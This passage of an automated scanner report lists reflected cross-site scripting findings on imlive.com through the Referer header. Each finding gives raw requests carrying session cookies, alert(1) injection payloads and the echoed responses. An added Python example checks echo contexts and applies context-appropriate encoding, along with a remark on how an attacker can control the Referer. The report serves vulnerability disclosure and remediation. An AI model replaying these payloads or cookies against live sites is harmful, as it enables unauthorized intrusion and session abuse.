The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4ad1'><script>alert(1)</script>5d132d65cec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:01 GMT
Connection: close
Content-Length: 19002
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232&lr=1107816009&ud=0&pe=categoryfs.asp&rf=http://www.google.com/search?hl=en^q=c4ad1'><script>alert(1)</script>5d132d65cec&qs=cat=232&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...
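
The two findings above show the same Referer value landing in two different syntactic contexts: a single-quoted JavaScript string literal in 4.940 (payload 98226'-alert(1)-'ff8df7e9357) and a single-quoted src attribute in 4.941 (payload c4ad1'><script>alert(1)</script>5d132d65cec), and the remediation note for the script case says only that the application should avoid echoing there. The Python below is an added example, not code from the scanner report or from imlive.com. It reproduces the scanner's context classification on two constructed fragments shaped like the snippets above (the tracker host analytic.example.test and the two templates are made up; only the two payload strings come from the report), shows each context being broken by the raw value, and then applies the encoder that fits each context (\xHH escaping inside the JavaScript literal, entity encoding inside the attribute) and checks that the injected quote no longer terminates anything. One caveat on the report's "not trivial to exploit" note: the Referer is the URL of the linking page, query string included, unless a referrer policy strips it, so an attacker who links to the target from a page whose own URL carries the payload controls this header without any Flash-style header injection.

```python
"""Context check and encoders for a Referer value echoed into a page.

Added example, not part of the scanner report or of the imlive.com code.
The tracker host and both fragments are CONSTRUCTED to mirror the shapes in
findings 4.940 (single-quoted JavaScript string) and 4.941 (single-quoted
HTML attribute); only the payload strings are taken from the report.
"""
import html
import re
from html.parser import HTMLParser

TRACKER = "http://analytic.example.test/w.gif?c=121273&rf="   # constructed host
SCRIPT_TEMPLATE = ("<script type=\"text/javascript\">try{var imgSrc='"
                   + TRACKER + "__RF__&ld=701';}catch(e){};</script>")
IMG_TEMPLATE = ("<img border=0 name='an' src='" + TRACKER
                + "__RF__&ld=701' height='1' width='1'>")

# Referer values as the scanner sent them (payloads from findings 4.940 / 4.941).
REFERER_JS = "http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357"
REFERER_ATTR = "http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec"


def echo_context(body: str, value: str) -> str:
    """Locate the raw `value` in `body` and name the context it landed in, the
    way the scanner does: 'js-string', 'js-code', 'html-attribute', 'html-text'
    or 'not-echoed' (the raw value is absent, e.g. because it was encoded)."""
    idx = body.find(value)
    if idx < 0:
        return "not-echoed"
    head = body[:idx]
    script_open = head.rfind("<script")
    if script_open >= 0 and head.find("</script", script_open) < 0:
        # an odd number of single quotes since <script means we are inside '...'
        return "js-string" if head[script_open:].count("'") % 2 else "js-code"
    tag_open = head.rfind("<")
    if tag_open >= 0 and head.find(">", tag_open) < 0:
        return "html-attribute"
    return "html-text"


def js_string_encode(value: str) -> str:
    """Encode for a quoted JavaScript string literal: every character outside
    [A-Za-z0-9] becomes \\xHH (or \\uHHHH above U+00FF), so quotes, backslashes,
    newlines and '</script>' can end neither the literal nor the script block."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) <= 0xFF:
            out.append("\\x%02X" % ord(ch))
        else:
            out.append("\\u%04X" % ord(ch))
    return "".join(out)


def js_string_decode(literal: str) -> str:
    """What the JS engine makes of the escapes: inverse of js_string_encode."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


def attr_encode(value: str) -> str:
    """Encode for a quoted HTML attribute value: & < > \" and ' become entities."""
    return html.escape(value, quote=True)


def js_literal_broken(fragment: str) -> bool:
    """True when the imgSrc literal holds an unescaped quote, i.e. the injected
    value terminated the string and whatever follows is parsed as code."""
    literal = re.search(r"var imgSrc='(.*)';\}catch", fragment, re.S).group(1)
    return re.search(r"(?<!\\)'", literal) is not None


class _FirstImg(HTMLParser):
    """Collects start-tag names and the (entity-decoded) src of the first <img>."""
    def __init__(self):
        super().__init__()
        self.tags, self.src = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "img" and self.src is None:
            self.src = dict(attrs).get("src")


def attr_broken(fragment: str, referer: str) -> bool:
    """True when the <img> no longer carries the intended tracker URL as its src
    or an extra tag appeared: the injected value closed the attribute or tag."""
    p = _FirstImg()
    p.feed(fragment)
    p.close()
    return p.src != TRACKER + referer + "&ld=701" or p.tags != ["img"]


def assess(referer: str) -> dict:
    """Render both fragments with the Referer raw (as the report shows it) and
    with the context-appropriate encoder; report context and breakout for each."""
    raw_js = SCRIPT_TEMPLATE.replace("__RF__", referer)
    safe_js = SCRIPT_TEMPLATE.replace("__RF__", js_string_encode(referer))
    raw_img = IMG_TEMPLATE.replace("__RF__", referer)
    safe_img = IMG_TEMPLATE.replace("__RF__", attr_encode(referer))
    return {
        "js_raw": (echo_context(raw_js, referer), js_literal_broken(raw_js)),
        "js_safe": (echo_context(safe_js, referer), js_literal_broken(safe_js)),
        "img_raw": (echo_context(raw_img, referer), attr_broken(raw_img, referer)),
        "img_safe": (echo_context(safe_img, referer), attr_broken(safe_img, referer)),
    }


if __name__ == "__main__":
    for finding, ref in (("4.940", REFERER_JS), ("4.941", REFERER_ATTR)):
        print(finding, assess(ref))
```

The encoders are deliberately context-specific: entity encoding would not help inside the script block (the browser's HTML parser does not decode entities in script content, so &#x27; would stay literal text and a raw quote would still break the literal), and \xHH escaping means nothing to the HTML attribute parser. Note also that the hex-escaped literal still evaluates to the original Referer, which is why the decode round-trip is part of the check.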

4.942. http://imlive.com/categoryfs.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b27c2'><script>alert(1)</script>5c3f838203 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryfs.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b27c2'><script>alert(1)</script>5c3f838203

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8327
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=b27c2'><script>alert(1)</script>5c3f838203&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.943. http://imlive.com/categoryms.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aec77'><script>alert(1)</script>01882fe6e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=aec77'><script>alert(1)</script>01882fe6e1e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:02 GMT
Connection: close
Content-Length: 21894
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2&lr=1107816009&ud=0&pe=categoryms.asp&rf=http://www.google.com/search?hl=en^q=aec77'><script>alert(1)</script>01882fe6e1e&qs=cat=2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.944. http://imlive.com/categoryms.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69bb4'><script>alert(1)</script>8751657e5a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /categoryms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=69bb4'><script>alert(1)</script>8751657e5a8

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:26 GMT
Connection: close
Content-Length: 8328
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/404.asp&lr=1107816009&ud=0&pe=404.asp&rf=http://www.google.com/search?hl=en^q=69bb4'><script>alert(1)</script>8751657e5a8&qs=404;http://imlive.com:80/404.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.945. http://imlive.com/customerservice.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /customerservice.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5eb49'><script>alert(1)</script>a0a4a130032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /customerservice.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=5eb49'><script>alert(1)</script>a0a4a130032

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:15 GMT
Connection: close
Content-Length: 14451
Vary: Accept-Encoding


<HTML>
   <HEAD>
       <title>Customer Service - Live Video Chat at ImLive</title>
       <meta name="description" content="You are very important to us, and we strive to provide you with world class custom
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/help/guide/guide.asp&lr=1107816009&ud=0&pe=help/guide/guide.asp&rf=http://www.google.com/search?hl=en^q=5eb49'><script>alert(1)</script>a0a4a130032&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.946. http://imlive.com/disclaimer.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /disclaimer.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d32e'><script>alert(1)</script>90577f18320 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /disclaimer.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=3d32e'><script>alert(1)</script>90577f18320

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:51 GMT
Connection: close
Content-Length: 78924
Vary: Accept-Encoding


<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp&lr=1107816009&ud=0&pe=disclaimer.asp&rf=http://www.google.com/search?hl=en^q=3d32e'><script>alert(1)</script>90577f18320&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.947. http://imlive.com/forgot.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1365d'-alert(1)-'8c7ad16a976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=1365d'-alert(1)-'8c7ad16a976

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:38 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=1365d'-alert(1)-'8c7ad16a976&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.948. http://imlive.com/forgot.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31f'-alert(1)-'d8c094b7adb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

